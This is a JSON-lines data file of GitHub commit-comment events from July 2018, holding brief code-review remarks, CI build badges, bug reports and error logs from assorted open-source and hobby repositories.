{"id":"8042438861","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29900072,"position":17,"line":17,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-31T08:09:25Z","updated_at":"2018-07-31T08:09:25Z","author_association":"COLLABORATOR","body":"css"}},"created_at":"2018-07-31T08:09:25Z"}
{"id":"8042439000","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"olegz/spring-cloud-function"},"payload":{"comment":{"id":29900073,"position":22,"line":55,"path":"spring-cloud-function-context/src/main/java/org/springframework/cloud/function/context/FunctionRegistration.java","commit_id":"ed14474b9f5dbd813b499ce97221ddb4876faa71","created_at":"2018-07-31T08:09:27Z","updated_at":"2018-07-31T08:09:27Z","author_association":"NONE","body":"I don't think there's any need to deprecate here (the names are mutable)."}},"created_at":"2018-07-31T08:09:27Z"}
{"id":"8042439510","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29900076,"position":26,"line":26,"path":"019/1902.html","commit_id":"f5e1be67505177707df4f97eefb9d873c89d8311","created_at":"2018-07-31T08:09:34Z","updated_at":"2018-07-31T08:09:34Z","author_association":"COLLABORATOR","body":"each"}},"created_at":"2018-07-31T08:09:34Z"}
{"id":"8042440100","type":"CommitCommentEvent","actor":{"login":"kazuki-kachiri"},"repo":{"name":"kazuki-kachiri/klack"},"payload":{"comment":{"id":29900081,"position":69,"line":75,"path":"pages/index.vue","commit_id":"09126381448bddee4009c19f50f8c41cf96bb3b4","created_at":"2018-07-31T08:09:41Z","updated_at":"2018-07-31T08:09:41Z","author_association":"OWNER","body":"命名を後で変更"}},"created_at":"2018-07-31T08:09:41Z"}
{"id":"8042441967","type":"CommitCommentEvent","actor":{"login":"freeznet"},"repo":{"name":"colorzzr/Calculator-Parser-Back"},"payload":{"comment":{"id":29900084,"position":null,"line":null,"path":null,"commit_id":"f31b14f3a983b91769478dc5b65098aca40149c0","created_at":"2018-07-31T08:10:05Z","updated_at":"2018-07-31T08:10:05Z","author_association":"CONTRIBUTOR","body":"别把数据库的帐号密码ip这些暴露出来，当心被入侵。。。"}},"created_at":"2018-07-31T08:10:05Z"}
{"id":"8042442459","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29900085,"position":null,"line":null,"path":null,"commit_id":"5423618217002d7a4b63ee843d08df79354bcd31","created_at":"2018-07-31T08:10:11Z","updated_at":"2018-07-31T08:10:11Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5423618217002d7a4b63ee843d08df79354bcd31-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-31T08:10:11Z"}
{"id":"8042444369","type":"CommitCommentEvent","actor":{"login":"kelvin-cao"},"repo":{"name":"susanmicrosemi/switchtec-kernel"},"payload":{"comment":{"id":29900090,"position":5,"line":580,"path":"switchtec.c","commit_id":"cec33df78d7a3e0a2d1c66148bccae372ee0fcb8","created_at":"2018-07-31T08:10:36Z","updated_at":"2018-07-31T08:10:36Z","author_association":"NONE","body":"Incorrect indent."}},"created_at":"2018-07-31T08:10:36Z"}
{"id":"8042445821","type":"CommitCommentEvent","actor":{"login":"adefirmanf"},"repo":{"name":"adefirmanf/PixivVoteApp"},"payload":{"comment":{"id":29900092,"position":null,"line":null,"path":null,"commit_id":"fcdf48e10c55306606921d7a8c3ce83970710e1b","created_at":"2018-07-31T08:10:53Z","updated_at":"2018-07-31T08:10:53Z","author_association":"OWNER","body":"Refer to issue : #6 "}},"created_at":"2018-07-31T08:10:53Z"}
{"id":"8042449570","type":"CommitCommentEvent","actor":{"login":"bauermar"},"repo":{"name":"FluidTYPO3/vhs"},"payload":{"comment":{"id":29900097,"position":null,"line":null,"path":null,"commit_id":"18f8f015815b9b215f2423bad32670a73671eaff","created_at":"2018-07-31T08:11:32Z","updated_at":"2018-07-31T08:11:32Z","author_association":"NONE","body":"#1502 "}},"created_at":"2018-07-31T08:11:32Z"}
{"id":"8042453011","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"tdelhomme/template-nf"},"payload":{"comment":{"id":29900100,"position":null,"line":null,"path":null,"commit_id":"668356bba3049a3fa63c1ce1b5c6e0a4fc85b8e1","created_at":"2018-07-31T08:12:14Z","updated_at":"2018-07-31T08:12:14Z","author_association":"OWNER","body":"related to https://groups.google.com/forum/#!topic/nextflow/sZEhsc4HbOQ"}},"created_at":"2018-07-31T08:12:14Z"}
{"id":"8042453163","type":"CommitCommentEvent","actor":{"login":"TagnumElite"},"repo":{"name":"TagnumElite/blender_nif_plugin"},"payload":{"comment":{"id":29900101,"position":null,"line":null,"path":null,"commit_id":"085053dfae9236edd9eaecb85473aa36c0452731","created_at":"2018-07-31T08:12:16Z","updated_at":"2018-07-31T08:12:16Z","author_association":"OWNER","body":"HOW THE ...."}},"created_at":"2018-07-31T08:12:16Z"}
{"id":"8042458818","type":"CommitCommentEvent","actor":{"login":"escopecz"},"repo":{"name":"mautic-inc/plugin-mautic-integrations"},"payload":{"comment":{"id":29900115,"position":49,"line":73,"path":"Config/config.php","commit_id":"aaded00e7bf9b06d54cb56e3cd33b0b0caae345e","created_at":"2018-07-31T08:13:27Z","updated_at":"2018-07-31T08:13:27Z","author_association":"NONE","body":"Commenting out line 60 kept me going for a bit, but then\r\n\r\n`Error: Uncaught Symfony\\Component\\Debug\\Exception\\UndefinedMethodException: Attempted to call an undefined method named \"loadMetadata\" of class \"MauticPlugin\\MauticIntegrationsBundle\\Entity\\FieldChangeRepository\". in /Users/jan/dev/mautic-hosted/vendor/doctrine/common/lib/Doctrine/Common/Persistence/Mapping/Driver/StaticPHPDriver.php:79`"}},"created_at":"2018-07-31T08:13:27Z"}
{"id":"8042464555","type":"CommitCommentEvent","actor":{"login":"jkbriant"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29900124,"position":null,"line":null,"path":null,"commit_id":"4418e32f99fd1d31588aef65b352eae43a474f49","created_at":"2018-07-31T08:14:40Z","updated_at":"2018-07-31T08:14:40Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ADD: ui, rotation and layers](https://trello.com/c/X55M2LxM/6-add-ui-rotation-and-layers)"}},"created_at":"2018-07-31T08:14:40Z"}
{"id":"8042466208","type":"CommitCommentEvent","actor":{"login":"martini"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29900131,"position":13,"line":241,"path":"contrib/packager.io/functions","commit_id":"4a610346ccee0dab0067c40bfdaf22d79da5649b","created_at":"2018-07-31T08:15:01Z","updated_at":"2018-07-31T08:15:01Z","author_association":"COLLABORATOR","body":"@monotek the current index may also be changed, you can get the current configured by using: \r\n\r\n`rails r 'puts Setting.get(\"es_index\")'`\r\n\r\nNote: `_production` will be added automatically because it's production environment.\r\n\r\n"}},"created_at":"2018-07-31T08:15:01Z"}
{"id":"8042466660","type":"CommitCommentEvent","actor":{"login":"jkbriant"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29900133,"position":null,"line":null,"path":null,"commit_id":"93d6ad95c228cfc6e42eab675c9dc0be95cb7604","created_at":"2018-07-31T08:15:08Z","updated_at":"2018-07-31T08:15:08Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ADD: layer functionality](https://trello.com/c/2ozplK8b/9-add-layer-functionality)"}},"created_at":"2018-07-31T08:15:08Z"}
{"id":"8042466721","type":"CommitCommentEvent","actor":{"login":"jkbriant"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29900134,"position":null,"line":null,"path":null,"commit_id":"93d6ad95c228cfc6e42eab675c9dc0be95cb7604","created_at":"2018-07-31T08:15:08Z","updated_at":"2018-07-31T08:15:08Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ADD: layer functionality](https://trello.com/c/2ozplK8b/9-add-layer-functionality)"}},"created_at":"2018-07-31T08:15:08Z"}
{"id":"8042467504","type":"CommitCommentEvent","actor":{"login":"b1tlite"},"repo":{"name":"dzenX/music_bot"},"payload":{"comment":{"id":29900139,"position":null,"line":null,"path":null,"commit_id":"50a3573c3e91bc1562e929282cbae18d0a6e3ef8","created_at":"2018-07-31T08:15:16Z","updated_at":"2018-07-31T08:15:16Z","author_association":"COLLABORATOR","body":"Git push blet"}},"created_at":"2018-07-31T08:15:16Z"}
{"id":"8042468763","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29900141,"position":null,"line":null,"path":null,"commit_id":"3fb606eb2cfb3e0fcb2c34a145aa825539947b32","created_at":"2018-07-31T08:15:31Z","updated_at":"2018-07-31T08:15:31Z","author_association":"NONE","body":"I'm in doubt if this is a [-3,1] or [0,4]..."}},"created_at":"2018-07-31T08:15:31Z"}
{"id":"8042470037","type":"CommitCommentEvent","actor":{"login":"jkbriant"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29900144,"position":null,"line":null,"path":null,"commit_id":"bb9a9d1e797389497322e29f986cea7fe2b9fa56","created_at":"2018-07-31T08:15:47Z","updated_at":"2018-07-31T08:15:47Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ADD: keyboard panning](https://trello.com/c/WISK5Rkc/4-add-keyboard-panning)"}},"created_at":"2018-07-31T08:15:47Z"}
{"id":"8042471202","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"BayLibre/u-boot"},"payload":{"comment":{"id":29900149,"position":null,"line":null,"path":null,"commit_id":"427ce42b1df536ef889bc051a164383d812f25df","created_at":"2018-07-31T08:16:02Z","updated_at":"2018-07-31T08:16:02Z","author_association":"MEMBER","body":"Yes, you need to get the fip files from the amlogic buildroot tarball, you can follow the instructions here : https://github.com/superna9999/u-boot/blob/ecc03fb0e5eec886c6301a93136333f474817426/board/amlogic/libretech-ac/README#L52"}},"created_at":"2018-07-31T08:16:02Z"}
{"id":"8042472056","type":"CommitCommentEvent","actor":{"login":"jkbriant"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29900150,"position":null,"line":null,"path":null,"commit_id":"c52cd2c29f606322c79b5c7e9f510b2fbd1fb2d6","created_at":"2018-07-31T08:16:12Z","updated_at":"2018-07-31T08:16:12Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [ADD: cable and source functionality](https://trello.com/c/7fuayLZg/3-add-cable-and-source-functionality)"}},"created_at":"2018-07-31T08:16:12Z"}
{"id":"8042473018","type":"CommitCommentEvent","actor":{"login":"escopecz"},"repo":{"name":"mautic-inc/plugin-mautic-integrations"},"payload":{"comment":{"id":29900151,"position":49,"line":73,"path":"Config/config.php","commit_id":"aaded00e7bf9b06d54cb56e3cd33b0b0caae345e","created_at":"2018-07-31T08:16:24Z","updated_at":"2018-07-31T08:16:24Z","author_association":"NONE","body":"Solution: change the line to `\\MauticPlugin\\MauticIntegrationsBundle\\Entity\\FieldChange::class,`"}},"created_at":"2018-07-31T08:16:24Z"}
{"id":"8042481042","type":"CommitCommentEvent","actor":{"login":"rKaradjia"},"repo":{"name":"rKaradjia/Autoroute_angular"},"payload":{"comment":{"id":29900161,"position":null,"line":null,"path":null,"commit_id":"d0bcbc210dd131ea4b5d495a2b97f740cdbb2bfa","created_at":"2018-07-31T08:18:01Z","updated_at":"2018-07-31T08:18:01Z","author_association":"OWNER","body":"+ Suppression commentaires\r\n"}},"created_at":"2018-07-31T08:18:01Z"}
{"id":"8042482692","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"wsnipex/xbmc"},"payload":{"comment":{"id":29900163,"position":20,"line":80,"path":"cmake/modules/FindFlatBuffers.cmake","commit_id":"46527b86db329fdae03607960fa9b8def3b98df7","created_at":"2018-07-31T08:18:20Z","updated_at":"2018-07-31T08:18:20Z","author_association":"OWNER","body":"as long as they are in the same dir, no. If you're planning to add several new dirs, then we should look for a better solution."}},"created_at":"2018-07-31T08:18:20Z"}
{"id":"8042516879","type":"CommitCommentEvent","actor":{"login":"rachinin1"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29900230,"position":null,"line":null,"path":null,"commit_id":"0bbd5be11d173260b7001e9599ebf7c29b0ebfdb","created_at":"2018-07-31T08:25:13Z","updated_at":"2018-07-31T08:25:13Z","author_association":"COLLABORATOR","body":"Затестил твои изменения, если нахожусь на http://localhost/pulstime.ru/docs/delivery это сразу после корзины кнопка оформить заказ. Если выбираю самовывоз то \r\nWarning\r\n: Use of undefined constant YD_LIB - assumed 'YD_LIB' (this will throw an Error in a future version of PHP) in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\pay.php\r\non line\r\n2\r\nWarning\r\n: require_once(YD_LIB/deliveryFunctions.php): failed to open stream: No such file or directory in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\pay.php\r\non line\r\n2\r\nFatal error\r\n: require_once(): Failed opening required 'YD_LIB/deliveryFunctions.php' (include_path='C:\\xampp\\php\\PEAR') in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\pay.php\r\non line\r\n2\r\n\r\nЕсли выбираю \"Доставка\" и начинаю вводить адрес то ничего не происходит, а был автоподбор. Нажимаю \"Выбрать способ получения\" прилетает следующая ошибка\r\n\r\narray(2) { [\"cartItems\"]=> string(771) \"a:1:{i:0;a:18:{s:6:\"itemid\";s:8:\"90057422\";s:9:\"productid\";s:2:\"13\";s:4:\"name\";s:10:\"Polar A360\";s:7:\"colorid\";s:1:\"1\";s:6:\"sizeid\";s:1:\"2\";s:10:\"image_list\";s:59:\"90057422_item_1.jpg;90057422_item_2.jpg;90057422_item_3.jpg\";s:5:\"chars\";s:176:\"Язык интерфейса-русский и еще 16 языков;Сенсорное управление-есть;Дисплей-цветной, 80 x 160 пикселей\";s:8:\"complect\";s:101:\"Браслет A360;Кабель usb-micro usb;инструкция;гарантийный талон\";s:5:\"price\";s:5:\"11990\";s:8:\"oldprice\";s:5:\"13000\";s:7:\"instock\";s:1:\"1\";s:5:\"color\";s:12:\"Черный\";s:9:\"color_eng\";s:5:\"black\";s:4:\"size\";s:1:\"M\";s:3:\"qty\";i:1;s:3:\"sum\";i:11990;s:9:\"discPrice\";i:0;s:7:\"discSum\";i:0;}}\" [\"delivery\"]=> string(177) \"O:17:\"Pulstime\\Delivery\":2:{s:4:\"type\";s:6:\"yandex\";s:7:\"address\";O:24:\"Pulstime\\DeliveryAddress\":3:{s:4:\"city\";s:16:\"Кострома\";s:6:\"street\";s:0:\"\";s:5:\"house\";s:0:\"\";}}\" }\r\n\r\nNotice\r\n: Trying to get property 'delivery' of non-object in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\yandexDelivery.php\r\non line\r\n20\r\n\r\n\r\nNotice\r\n: Trying to get property 'address' of non-object in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\yandexDelivery.php\r\non line\r\n20\r\n\r\n\r\nNotice\r\n: Trying to get property 'city' of non-object in\r\nC:\\xampp\\htdocs\\pulstime.ru\\php\\checkout\\yandexDelivery.php\r\non line\r\n24\r\n\r\nтак понимаю он обращается к старым файлам pay.php и yandexdelivery.php"}},"created_at":"2018-07-31T08:25:13Z"}
{"id":"8042523661","type":"CommitCommentEvent","actor":{"login":"drupchen"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29900254,"position":5,"line":3928,"path":"derge-kangyur-tags/008-tagged.txt","commit_id":"e9894f066f4d3f155f65df9b56c95bfadf2e52e0","created_at":"2018-07-31T08:26:31Z","updated_at":"2018-07-31T08:26:31Z","author_association":"NONE","body":"ལགས་སོ། ལགས་སོ། ངའི་ངོས་ནས་དྲན་པ་མ་བརྗེ་བ་ཙམ་གྱི་ཆེད་དུ་བཀོད་ཡོད། ལས་ཀ་ལས་བཞིན་པའི་སྐབས་དེ་འདྲ་མ་ཡོང་ཐབས་མེད་རེད།"}},"created_at":"2018-07-31T08:26:31Z"}
{"id":"8042523778","type":"CommitCommentEvent","actor":{"login":"wyb123"},"repo":{"name":"wyb123/-tensorflow-"},"payload":{"comment":{"id":29900255,"position":null,"line":null,"path":null,"commit_id":"8a47d26be71f37a00923bdfac3214c4d13c18c25","created_at":"2018-07-31T08:26:32Z","updated_at":"2018-07-31T08:26:32Z","author_association":"OWNER","body":"个人深度学习tensorflow的学习历程"}},"created_at":"2018-07-31T08:26:32Z"}
{"id":"8042527850","type":"CommitCommentEvent","actor":{"login":"psyborg55"},"repo":{"name":"qca/open-ath9k-htc-firmware"},"payload":{"comment":{"id":29900259,"position":null,"line":null,"path":null,"commit_id":"424081373f5ead302a9c06307fecaae5ad04370a","created_at":"2018-07-31T08:27:16Z","updated_at":"2018-07-31T08:27:16Z","author_association":"NONE","body":"any idea what do lines 178 and 305 undefine? #undef\tHT_HGI"}},"created_at":"2018-07-31T08:27:16Z"}
{"id":"8042528131","type":"CommitCommentEvent","actor":{"login":"Shent"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900260,"position":13,"line":12,"path":"src/components/WebShop.jsx","commit_id":"dab7ec1d2949cf92fbf38ffb84facb37127bcaae","created_at":"2018-07-31T08:27:19Z","updated_at":"2018-07-31T08:27:19Z","author_association":"NONE","body":"Good idea, to extract some constants and make the code less rigid. "}},"created_at":"2018-07-31T08:27:19Z"}
{"id":"8042530139","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900265,"position":null,"line":null,"path":null,"commit_id":"19ecb9310370ec0da0d2c2d527392c19db6f5917","created_at":"2018-07-31T08:27:42Z","updated_at":"2018-07-31T08:27:42Z","author_association":"CONTRIBUTOR","body":"FYI\r\nhttps://github.com/OpenPLi/enigma2/commit/550ba650c66433100ff84438766a5cdd5dddff55"}},"created_at":"2018-07-31T08:27:42Z"}
{"id":"8042530460","type":"CommitCommentEvent","actor":{"login":"methane"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29900266,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-31T08:27:46Z","updated_at":"2018-07-31T08:27:46Z","author_association":"NONE","body":"I meant this. https://bugs.python.org/issue29259#msg285416"}},"created_at":"2018-07-31T08:27:46Z"}
{"id":"8042534122","type":"CommitCommentEvent","actor":{"login":"Shent"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900274,"position":22,"line":22,"path":"src/utils.js","commit_id":"dab7ec1d2949cf92fbf38ffb84facb37127bcaae","created_at":"2018-07-31T08:28:27Z","updated_at":"2018-07-31T08:28:27Z","author_association":"NONE","body":"That was an important fix, rather than filtering in the component. Very good."}},"created_at":"2018-07-31T08:28:27Z"}
{"id":"8042534670","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29900276,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-31T08:28:33Z","updated_at":"2018-07-31T08:28:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T08:28:33Z"}
{"id":"8042539939","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29900287,"position":null,"line":null,"path":null,"commit_id":"65c4da0d6a6e2ee668b1ebc7333d0065ebe8aaad","created_at":"2018-07-31T08:29:37Z","updated_at":"2018-07-31T08:29:37Z","author_association":"OWNER","body":"Excellent refinement, quick-fire iteration -> well-rounded result!"}},"created_at":"2018-07-31T08:29:37Z"}
{"id":"8042546552","type":"CommitCommentEvent","actor":{"login":"Shent"},"repo":{"name":"fozodavid/react-webshop"},"payload":{"comment":{"id":29900304,"position":5,"line":1,"path":"src/App.js","commit_id":"dab7ec1d2949cf92fbf38ffb84facb37127bcaae","created_at":"2018-07-31T08:30:52Z","updated_at":"2018-07-31T08:30:52Z","author_association":"NONE","body":"If you follow https://standardjs.com/  in your code - then single quotes are used. However that is a developer preference, so you could pick your own standard or accept some else's. The important bit is to be consistent. "}},"created_at":"2018-07-31T08:30:52Z"}
{"id":"8042550346","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"orbit/orbit"},"payload":{"comment":{"id":29900315,"position":54,"line":353,"path":"actors/json/src/main/java/cloud/orbit/actors/extensions/json/JsonMessageSerializer.java","commit_id":"c619f4ad40e96ae4fad0ac8fb4d71f228ebb1fcb","created_at":"2018-07-31T08:31:38Z","updated_at":"2018-07-31T08:31:38Z","author_association":"CONTRIBUTOR","body":"@cowtowncoder was a bit naughty of you to change public API in a minor version :man_facepalming: "}},"created_at":"2018-07-31T08:31:38Z"}
{"id":"8042553038","type":"CommitCommentEvent","actor":{"login":"methane"},"repo":{"name":"jdemeyer/cpython"},"payload":{"comment":{"id":29900317,"position":22,"line":350,"path":"Include/object.h","commit_id":"ea8e94921f528544865e49352413eb2101e7640c","created_at":"2018-07-31T08:32:11Z","updated_at":"2018-07-31T08:32:11Z","author_association":"NONE","body":"And I found GH-4944.  Happily, it's not a problem from 3.8."}},"created_at":"2018-07-31T08:32:11Z"}
{"id":"8042553595","type":"CommitCommentEvent","actor":{"login":"ThomasAbballe"},"repo":{"name":"Alneos/vega"},"payload":{"comment":{"id":29900318,"position":null,"line":null,"path":null,"commit_id":"836983f95aa9be7a527f5bee5de5309cb57ac1ec","created_at":"2018-07-31T08:32:17Z","updated_at":"2018-07-31T08:32:17Z","author_association":"COLLABORATOR","body":"Thanks for your answer and corrections! I push your correction to Gitlab... but it seems to create divergent branches, now ? I'll stick to github for now too, and we'll merge both repo in September."}},"created_at":"2018-07-31T08:32:17Z"}
{"id":"8042556040","type":"CommitCommentEvent","actor":{"login":"adefirmanf"},"repo":{"name":"adefirmanf/PixivVoteApp"},"payload":{"comment":{"id":29900322,"position":null,"line":null,"path":null,"commit_id":"fb480be4212c64dfc86902d0ce56474450bd0b25","created_at":"2018-07-31T08:32:45Z","updated_at":"2018-07-31T08:32:45Z","author_association":"OWNER","body":"Refer to #6 "}},"created_at":"2018-07-31T08:32:45Z"}
{"id":"8042558655","type":"CommitCommentEvent","actor":{"login":"adefirmanf"},"repo":{"name":"adefirmanf/PixivVoteApp"},"payload":{"comment":{"id":29900325,"position":null,"line":null,"path":null,"commit_id":"607028cfd26c13da4c895b2ab691f91bbc2495ca","created_at":"2018-07-31T08:33:16Z","updated_at":"2018-07-31T08:33:16Z","author_association":"OWNER","body":"Refer to #6 "}},"created_at":"2018-07-31T08:33:16Z"}
{"id":"8042562515","type":"CommitCommentEvent","actor":{"login":"ultrakiwi99"},"repo":{"name":"ultrakiwi99/pulstime.ru"},"payload":{"comment":{"id":29900331,"position":null,"line":null,"path":null,"commit_id":"0bbd5be11d173260b7001e9599ebf7c29b0ebfdb","created_at":"2018-07-31T08:34:02Z","updated_at":"2018-07-31T08:34:02Z","author_association":"OWNER","body":"Остальное включая быструю доставку работает? Если да то ок, потому что автоподбор и расчет вариантов и тарифов будет переписан под новую библиотеку. "}},"created_at":"2018-07-31T08:34:02Z"}
{"id":"8042564186","type":"CommitCommentEvent","actor":{"login":"chellanihitesh"},"repo":{"name":"chellanihitesh/hello-world"},"payload":{"comment":{"id":29900350,"position":null,"line":null,"path":null,"commit_id":"dd24a0b296b72993012d1ac0187848fb921db3e6","created_at":"2018-07-31T08:34:22Z","updated_at":"2018-07-31T08:34:22Z","author_association":"OWNER","body":"Looks fine"}},"created_at":"2018-07-31T08:34:22Z"}
{"id":"8042572352","type":"CommitCommentEvent","actor":{"login":"smanish01"},"repo":{"name":"smanish01/test12"},"payload":{"comment":{"id":29900368,"position":null,"line":null,"path":null,"commit_id":"75acdc53a0fd4cef78b16c1b6e68d50060bfa72c","created_at":"2018-07-31T08:36:00Z","updated_at":"2018-07-31T08:36:00Z","author_association":"OWNER","body":"test commit"}},"created_at":"2018-07-31T08:36:00Z"}
{"id":"8042572661","type":"CommitCommentEvent","actor":{"login":"davidchisnall"},"repo":{"name":"gnustep/libobjc2"},"payload":{"comment":{"id":29900370,"position":7,"line":398,"path":"hash_table.h","commit_id":"a0eec52bb88f039b5f8a14603a1609caf3609691","created_at":"2018-07-31T08:36:04Z","updated_at":"2018-07-31T08:36:04Z","author_association":"COLLABORATOR","body":"I missed this in code review, but this contains an off-by-one error.  The `<=` should be simply `<`.  This will trigger currently when `cell == baseCell` and will make the entry for the *next* cell unreachable.  With the hash functions in use and insertion-removal patterns, this is quite rare - you almost never see the sequence of insert a value, then insert a value with the same hash without inserting anything else that lands in the next slot in the table, then remove the first value, but on win32 the weak references test failed nondeterministically about 10% of the time.  I will commit a fix shortly."}},"created_at":"2018-07-31T08:36:04Z"}
{"id":"8042574174","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900373,"position":32,"line":32,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:36:22Z","updated_at":"2018-07-31T08:36:22Z","author_association":"NONE","body":"Вместо &nbsp; лучше обычный пробел использовать"}},"created_at":"2018-07-31T08:36:22Z"}
{"id":"8042577139","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900377,"position":37,"line":37,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:36:56Z","updated_at":"2018-07-31T08:36:56Z","author_association":"NONE","body":"Вынеси svg в отдельный файл `image.svg` и подключи его тэгом <img>"}},"created_at":"2018-07-31T08:36:56Z"}
{"id":"8042579127","type":"CommitCommentEvent","actor":{"login":"EvanPurkhiser"},"repo":{"name":"brunchboy/dysentery"},"payload":{"comment":{"id":29900380,"position":null,"line":null,"path":null,"commit_id":"14b8d0575ddf991dc8fece33c5f8fe6c0217cb59","created_at":"2018-07-31T08:37:20Z","updated_at":"2018-07-31T08:37:20Z","author_association":"NONE","body":"> Ability to tell devices to turn sync on or off.\r\n> Ability to use Fader Start packets to tell devices to start or stop playing\r\n\r\nWe're practically ready to build a auto DJ bot"}},"created_at":"2018-07-31T08:37:20Z"}
{"id":"8042580782","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900382,"position":325,"line":325,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:37:39Z","updated_at":"2018-07-31T08:37:39Z","author_association":"NONE","body":"не используй инлайновые стили (аттрибут `style`)"}},"created_at":"2018-07-31T08:37:39Z"}
{"id":"8042584456","type":"CommitCommentEvent","actor":{"login":"DmitriyKozyatinskiy"},"repo":{"name":"EnchantedOrange/EnchantedOrange.github.io"},"payload":{"comment":{"id":29900388,"position":377,"line":377,"path":"index.html","commit_id":"9b41e3810922ca943e9e26f46eb10682433eb715","created_at":"2018-07-31T08:38:22Z","updated_at":"2018-07-31T08:38:22Z","author_association":"NONE","body":"svg в отдельный файл"}},"created_at":"2018-07-31T08:38:22Z"}
{"id":"8042585664","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29900391,"position":null,"line":null,"path":null,"commit_id":"19ecb9310370ec0da0d2c2d527392c19db6f5917","created_at":"2018-07-31T08:38:36Z","updated_at":"2018-07-31T08:38:36Z","author_association":"CONTRIBUTOR","body":"Thanks"}},"created_at":"2018-07-31T08:38:36Z"}
{"id":"8042587093","type":"CommitCommentEvent","actor":{"login":"tianmaoyu"},"repo":{"name":"tianmaoyu/Something"},"payload":{"comment":{"id":29900397,"position":null,"line":null,"path":null,"commit_id":"ff919f50759ceabd811e7c81db0c09bd127f761b","created_at":"2018-07-31T08:38:53Z","updated_at":"2018-07-31T08:38:53Z","author_association":"OWNER","body":"EnumJsonConvert"}},"created_at":"2018-07-31T08:38:53Z"}
